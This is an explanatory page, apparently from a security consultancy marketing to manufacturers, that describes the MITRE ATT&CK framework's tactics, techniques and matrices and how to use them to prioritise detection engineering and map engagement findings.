What is the MITRE ATT&CK framework?

Key takeaways

• MITRE ATT&CK provides a common vocabulary for describing attacker behavior at the technique level. Red teams, blue teams, threat intelligence, and detection engineering all reference the same model.
• The framework has three matrices: Enterprise (IT and cloud), Mobile, and ICS. Each contains tactics (the why), techniques (the how), and sub-techniques (more specific how).
• Mapping detection coverage to ATT&CK techniques surfaces the gaps in a security program more directly than any other framework.
• For mid-market manufacturers, the practical use of ATT&CK is to drive detection engineering priorities and to communicate findings across teams.
• ARG maps every engagement finding to specific ATT&CK techniques, so the output reads cleanly into the framework defenders are using.

How is MITRE ATT&CK structured?

ATT&CK organizes adversary behavior at four levels of specificity.

1. Tactics. The "why" of an attacker action. The strategic goal at a particular stage of an attack. The Enterprise matrix defines 14 tactics, in roughly the order they happen during an intrusion:

• Reconnaissance (TA0043)
• Resource Development (TA0042)
• Initial Access (TA0001)
• Execution (TA0002)
• Persistence (TA0003)
• Privilege Escalation (TA0004)
• Defense Evasion (TA0005)
• Credential Access (TA0006)
• Discovery (TA0007)
• Lateral Movement (TA0008)
• Collection (TA0009)
• Command and Control (TA0011)
• Exfiltration (TA0010)
• Impact (TA0040)

2. Techniques. The "how" - specific methods adversaries use to achieve each tactic. Examples:

• Phishing (T1566) under Initial Access
• PowerShell (T1059.001) under Execution
• OS Credential Dumping (T1003) under Credential Access
• Lateral Tool Transfer (T1570) under Lateral Movement
• Data Encrypted for Impact (T1486) under Impact

3. Sub-techniques. More specific variants of techniques. Phishing (T1566) has sub-techniques for Spearphishing Attachment (T1566.001), Spearphishing Link (T1566.002), Spearphishing via Service (T1566.003), and Spearphishing Voice (T1566.004).

4. Procedures. The actual implementation of a technique by a specific threat actor. Not a separate ID; described in the documentation for each technique with examples from real attacks. "FIN7 uses spearphishing emails with a Windows Script File attachment" is a procedure.

The four-level structure gives the framework precision without losing usability. A high-level conversation can reference tactics; an operational conversation can reference techniques; a detection engineering session can reference sub-techniques; a threat intelligence report can reference procedures.

The ATT&CK Enterprise, Mobile, and ICS matrices

MITRE maintains three matrices, each focused on a specific environment.

Enterprise. The largest matrix. Covers IT systems, cloud platforms, enterprise applications. Sub-matrices for Windows, macOS, Linux, Cloud (AWS, Azure, Google, SaaS, Office 365), and Network. Most relevant for the IT side of a mid-market manufacturer's environment.

Mobile. Adversary behavior against iOS and Android devices. Smaller than Enterprise. Useful for mid-market manufacturers with significant mobile workforce or BYOD exposure.

ICS. Industrial control systems. Distinct tactics relevant to operational technology environments: Initial Access via Engineering Workstation, Inhibit Response Function, Impair Process Control, Loss of Productivity, Damage to Property. Critical for manufacturers because the Enterprise matrix does not cover OT-specific adversary behavior. See What is an industrial control system (ICS)?.

For a mid-market manufacturer, both Enterprise and ICS matrices are operationally relevant. The Enterprise matrix covers the office IT environment and the IT side of OT-adjacent systems. The ICS matrix covers the OT environment specifically. A complete security program references both.

Why ATT&CK works as a common vocabulary across red, blue, and purple

Three properties make ATT&CK uniquely useful as a cross-team framework.

1. Empirically grounded. Techniques are derived from observed real-world attacks. The framework is descriptive, not prescriptive. A technique in ATT&CK exists because someone has observed it being used; speculative or theoretical attacks are not included.
2. Specific without being narrow. Techniques are specific enough to be operationally useful (a detection rule can target a specific technique) but broad enough to survive minor variants (T1059.001 PowerShell covers many specific PowerShell-based attacks).
3. Maintained as a living document. MITRE updates ATT&CK regularly as new techniques are observed and old techniques evolve. The framework tracks reality.

The cross-team value:

• Red teams describe their work in ATT&CK terms. "I exercised T1078 (Valid Accounts) followed by T1021 (Remote Services)" is precise and reproducible.
• Blue teams track detection coverage against ATT&CK. "We have detection coverage for T1059.001 PowerShell but not for T1059.003 Windows Command Shell" is actionable.
• Threat intelligence reports use ATT&CK to describe observed threat actor behavior. "This ransomware affiliate uses T1566.002, T1078, T1486."
• Purple teams use ATT&CK to organize the engagement: "Today we are exercising five techniques in Credential Access and three in Lateral Movement." See What is purple teaming?.
• Compliance maps controls to ATT&CK techniques. NIST CSF subcategories and CIS Safeguards both have published ATT&CK mappings.
• Incident response describes observed attacker behavior in ATT&CK terms during and after the incident, which standardizes lessons-learned and supports threat intelligence sharing.

The common vocabulary reduces translation overhead between teams and produces shared situational awareness.

Examples of techniques manufacturers are most exposed to

The techniques mid-market manufacturers face most often. Each one is worth knowing by ID:

• T1566 Phishing (and sub-techniques). The dominant initial-access vector. See What is spear phishing?.
• T1078 Valid Accounts. Use of stolen or default credentials to access systems. The follow-on to most phishing attacks.
• T1059 Command and Scripting Interpreter. PowerShell, Windows Command Shell, Python. Most ransomware uses one or more of these.
• T1003 OS Credential Dumping. LSASS access, credential theft from memory. The key step from initial access to lateral movement.
• T1021 Remote Services. RDP, SMB, WinRM. Used for lateral movement once credentials are stolen.
• T1567 Exfiltration Over Web Service. Data exfiltration over HTTPS, often to cloud storage. The data-loss step of most ransomware-extortion attacks.
• T1486 Data Encrypted for Impact. Ransomware encryption. The final step that produces the visible incident.
• T0859 Valid Accounts (ICS). OT-side equivalent of T1078. Used to access engineering workstations and SCADA systems.
• T0843 Program Download (ICS). Modifying or replacing PLC programs. See What is a PLC attack?.
• T1556 Modify Authentication Process. OAuth grants, mailbox rule modifications, MFA bypass setup. See What is consent phishing (OAuth phishing)?.

A detection program with coverage of these ten techniques addresses a large fraction of the realistic threat for a mid-market manufacturer. The list is not exhaustive; it is a starting prioritization.

How to use ATT&CK to prioritize detection engineering

Detection engineering with ATT&CK proceeds through five steps.

1. Identify the threat actors and groups most likely to target the organization. For a defense-supplier manufacturer, this includes ransomware affiliates (LockBit, BlackBasta, Akira), BEC operator groups, and (less commonly) nation-state actors. MITRE publishes group profiles with associated techniques.
2. Build a technique coverage map. For each technique used by the identified groups, document the current detection state: detected and alerting, detected and logged, not detected. The map shows the actual coverage state at the technique level.
3. Prioritize gaps by frequency and impact. Techniques used by many groups (high frequency) with high impact when successful drive the priority list. Techniques rarely used or low-impact wait.
4. Build or tune detections for the priority gaps. Each detection is built against a specific technique, with documentation, tunings, and false-positive controls.
5. Validate through simulation. Adaptive simulation, breach and attack simulation, and purple team exercises exercise the new detections to confirm they actually fire.

The cycle repeats. Coverage maps update; new threat intelligence brings new priorities; detection drift surfaces during validation; the program improves measurably over time.

Best practices for mapping controls to ATT&CK

For organizations using ATT&CK to organize their security program:

1. Map detections, not just controls. A control (EDR deployed) is not the same as a detection (a specific rule that fires on a specific technique). The detection map is what matters operationally.
2. Use the official ATT&CK Navigator or equivalent tooling. Don't recreate the matrix in a spreadsheet; use the tools MITRE publishes or commercial equivalents.
3. Track coverage by source. EDR rules, SIEM rules, identity-provider detections, OT-monitoring detections. Multiple sources covering the same technique provide depth; gaps where no source covers a technique are clearer.
4. Differentiate detect vs prevent. A technique can be prevented (the attack does not succeed) or detected (the attack succeeds and is noticed). Both are valuable; the program needs visibility into which it has for each technique.
5. Annotate confidence. Detection of T1003.001 with high confidence (an EDR-vendor-built rule with low false-positive rate) is different from a custom SIEM rule that fires occasionally on the right technique. The annotation matters for prioritization.
6. Update with each detection change. When a detection is added, modified, or removed, the coverage map updates. The map is a live artifact, not an annual report.
7. Coordinate with threat intelligence. New techniques emerging in the wild produce new priority gaps. The detection program needs a feed from threat intelligence (commercial, government, ISAC, industry).
8. Communicate coverage to executives in ATT&CK terms. "We cover 70% of the techniques used by ransomware affiliates targeting manufacturers" is more useful than "we have EDR everywhere".

MITRE ATT&CK FAQs

Is ATT&CK a framework or a knowledge base?

Technically a knowledge base. MITRE describes it as a knowledge base, not a framework or a standard. In practice, the security industry uses ATT&CK as a framework for organizing detection engineering, threat intelligence, and adversarial simulation. The terminology distinction matters less than the operational usage.

How is ATT&CK different from the Cyber Kill Chain?

The Lockheed Martin Cyber Kill Chain is a higher-level model with seven sequential phases. ATT&CK is a more detailed knowledge base with hundreds of specific techniques organized into fourteen tactics (Enterprise matrix). The Kill Chain provides a strategic frame; ATT&CK provides operational detail. Many organizations use both: Kill Chain for strategy conversations, ATT&CK for technical work.

Does MITRE ATT&CK cover physical attacks?

Partially. The Enterprise matrix includes initial-access techniques that have physical elements (e.g., Hardware Additions T1200, Replication Through Removable Media T1091). The ICS matrix covers physical-impact and physical-access concepts in industrial settings. Pure facility-entry tradecraft (tailgating, badge cloning, pretext entry) is not the primary focus; it falls under social engineering and physical-security frameworks. See What is physical penetration testing?.

What is the difference between ATT&CK and D3FEND?

ATT&CK catalogs adversary behavior; D3FEND catalogs defensive countermeasures. The two are complementary: ATT&CK tells you what attackers do, D3FEND tells you what defenses address each technique. D3FEND is newer and less widely adopted than ATT&CK but increasingly referenced in detection engineering work.

How ARG reports findings against ATT&CK techniques

Every ARG engagement finding maps to one or more MITRE ATT&CK techniques. The mapping happens during the engagement, so the report reads in the framework the client's detection team uses.

The work is operated by James Wall on the digital side, with David Ashby contributing on physical and OT mappings. The mapping covers both Enterprise and ICS matrices where appropriate.

For each finding, the report includes:

• Primary technique reference. The ATT&CK ID and name (T1566.001 Spearphishing Attachment, T1078 Valid Accounts, T0843 Program Download, etc.).
• Associated tactic. Initial Access, Credential Access, Lateral Movement, Impact, etc.
• Sub-techniques where applicable. More specific reference (T1566.002 for credential-harvest spear phishing).
• Procedure description. What ARG specifically did during the engagement.
• Detection state. Whether the technique was detected by the client's existing stack, and where the gap is if not.

Over multiple engagements, ARG produces a technique-coverage map specific to the client. The map shows which techniques the simulation has exercised, which were caught, which were missed, and how coverage has trended over time. The trend is the value: the program either improves measurably (more techniques caught faster) or it does not.

The output feeds two specific surfaces:

1. The client's detection engineering backlog. Specific techniques with gaps become specific detection-engineering work items. See What is purple teaming?.
2. Insurance and compliance evidence. Underwriters and assessors increasingly ask for ATT&CK-mapped evidence. The continuous engagement produces the documentation as a byproduct.

For founding clients, the technique-coverage map is part of the quarterly review packet alongside the risk register and the broader compliance-mapped findings.

Apply as a founding client or see how the engagement works for the full delivery cycle.